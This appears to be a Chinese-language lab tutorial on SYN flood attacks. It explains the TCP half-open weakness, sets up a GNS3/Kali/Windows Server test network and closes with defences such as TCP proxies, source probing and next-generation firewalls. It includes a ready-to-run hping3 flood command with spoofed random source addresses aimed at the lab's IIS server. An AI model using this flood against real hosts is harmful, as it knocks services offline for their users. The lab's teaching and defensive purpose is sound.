一、SYN Flood原理

在TCP三次握手過程中，

• 客戶端發(fā)送一個SYN包給服務(wù)器
• 服務(wù)端接收到SYN包后，會回復(fù)SYN+ACK包給客戶端，然后等待客戶端回復(fù)ACK包。
• 但此時客戶端并不會回復(fù)ACK包，所以服務(wù)端就只能一直等待直到超時。服務(wù)端超時后會重發(fā)SYN+ACK包給客戶端，默認(rèn)會重試5次，而且每次等待的時間都會增加。

服務(wù)器收到客戶端發(fā)來的SYN會建立一個半連接狀態(tài)的Socket，當(dāng)客戶端在一定時間內(nèi)持續(xù)不斷的發(fā)大量的SYN包但不回復(fù)ACK包，就會耗盡服務(wù)端的資源，這就是SYN Flood攻擊。

二、模擬SYN Flood攻擊

1、實(shí)驗(yàn)環(huán)境

kali、Windows10、GNS3

2、網(wǎng)絡(luò)拓?fù)?/h3>

3、實(shí)驗(yàn)配置

• GNS3路由器

R1#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#int f0/0
R1(config-if)#ip add 192.168.10.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#int f1/0
R1(config-if)#ip add 192.168.100.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#

• kali虛擬機(jī)配置網(wǎng)卡eth0

#打開interfaces文件并添加eth0網(wǎng)卡                                                                            
┌──(root?kali)-[/home/kali]
└─# vim /etc/network/interfaces                                                                                                                                                       

• ?啟用網(wǎng)卡并查看IP配置是否成功

┌──(root?kali)-[/home/kali]
└─# ifdown eth0
ifdown: interface eth0 not configured┌──(root?kali)-[/home/kali]
└─# ifup eth0#ifconfig查看上述更改是否生效                                                                            
┌──(root?kali)-[/home/kali]
└─# ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.10.1  netmask 255.255.255.0  broadcast 192.168.10.255inet6 fe80::20c:29ff:fee2:4449  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:e2:44:49  txqueuelen 1000  (Ethernet)RX packets 552  bytes 47915 (46.7 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 51  bytes 7410 (7.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 18558  bytes 1513808 (1.4 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 18558  bytes 1513808 (1.4 MiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0#ping測試看網(wǎng)關(guān)是否可達(dá)                                                                            
┌──(root?kali)-[/home/kali]
└─# ping 192.168.10.254         
PING 192.168.10.254 (192.168.10.254) 56(84) bytes of data.
64 bytes from 192.168.10.254: icmp_seq=1 ttl=255 time=44.6 ms
64 bytes from 192.168.10.254: icmp_seq=2 ttl=255 time=25.1 ms
^C
--- 192.168.10.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 25.077/34.838/44.599/9.761 ms

• 查看kali路由：?

└─# route -n           
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.10.254  0.0.0.0         UG    0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0

• Windows使用命令配靜態(tài)IP

C:\Windows\system32>netsh interface ip set address "Ethernet0" static 192.168.100.1 255.255.255.0 192.168.100.254  
#查看IP是否設(shè)置成功                                                                                                                                                                                                                                                                                                                                 C:\Windows\system32>ipconfig  
#ping測試看網(wǎng)關(guān)是否可達(dá)                                                                                                                                                                                                                                                                                                                                                                                                                         C:\Windows\system32>ping 192.168.100.254                                                                                                                                                                                                         

ping測試 ：kali 虛擬機(jī)pingWindows server 2016虛擬機(jī)

4、搭建IIS服務(wù)

• Windows server 2016上面搭建IIS服務(wù)并在本地進(jìn)行訪問

• kali火狐瀏覽器訪問

肉雞：幾十萬臺同時在發(fā)幾十萬個包

DDOS計算的是同時的流量

5、實(shí)施SYN Flood攻擊

• 工具：kali （hping3 ）

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.100.1
#-c 發(fā)送 包的數(shù)量
#-d 發(fā)送包的大小
#-S 只發(fā)送SYN的報文
-w 指定Windows窗口大小
#-p 指定目標(biāo)端口80
#--flood 
#--rand-source發(fā)請求的時候指定隨機(jī)的IP
#服務(wù)器的IP

• 多開幾個shell進(jìn)行 SYN Flood攻擊：

• ?抓到的ICMP數(shù)據(jù)包

三、如何防御SYN Flood

1、使用TCP代理的方式

客戶機(jī)先和代理服務(wù)器建立TCP連接，代理服務(wù)器收到TCP的ACK后，再將數(shù)據(jù)轉(zhuǎn)發(fā)給服務(wù)器

如果用DDOS服務(wù)器將代理服務(wù)器打掉了，服務(wù)器也不能正常提供服務(wù)了，因?yàn)榉?wù)器是通過代理來提供服務(wù)的。代理：選代理一般使用高性能防火墻。

2、TCP的源探測，探測發(fā)送方

client發(fā)送syn請求，防火墻偽造SYN+ACk報文，如果客戶機(jī)是虛假的源就不會響應(yīng)，如果客戶機(jī)是真實(shí)的源，就會發(fā)一個重新建立連接請求的RST報文。防火墻收到RST報文得知客戶機(jī)是真實(shí)的，放通將數(shù)據(jù)傳到服務(wù)器。

知識補(bǔ)充：下一代防火墻NGFW

不同信任級別的網(wǎng)絡(luò)之間的一個線速（wire-speed）實(shí)時防護(hù)設(shè)備，能夠?qū)α髁繄?zhí)行深度檢測，并阻斷攻擊。

• 前向兼容傳統(tǒng)防火墻的功能，包括包過濾、協(xié)議狀態(tài)過濾、NAT和VPN。
• 具備應(yīng)用感知能力，能基于應(yīng)用實(shí)施精細(xì)化的安全管控策略和層次化的帶寬管理手段。
• 支持IPS功能，實(shí)現(xiàn)IPS（入侵防御系統(tǒng)）與防火墻的深度融合。
  IPS系統(tǒng)是位于防火墻和網(wǎng)絡(luò)的設(shè)備之間的設(shè)備，當(dāng)檢測到攻擊時，IPS會在這種攻擊擴(kuò)散到網(wǎng)絡(luò)其他地方前阻止這個惡意通信。
  NGFW可以根據(jù)IPS檢測的惡意流量自動更新下發(fā)安全策略，而不需要管理員介入。
• 利用防火墻以外的信息，增強(qiáng)管控能力
  如利用ITit系統(tǒng)提供的用戶信息、位置信息、漏洞和網(wǎng)絡(luò)資源信息等，幫助改進(jìn)和優(yōu)化安全策略。如：通過集成用戶認(rèn)證系統(tǒng)，實(shí)現(xiàn)基于用戶的安全策略，以應(yīng)對移動辦公場景下IP地址變化帶來的管控難題。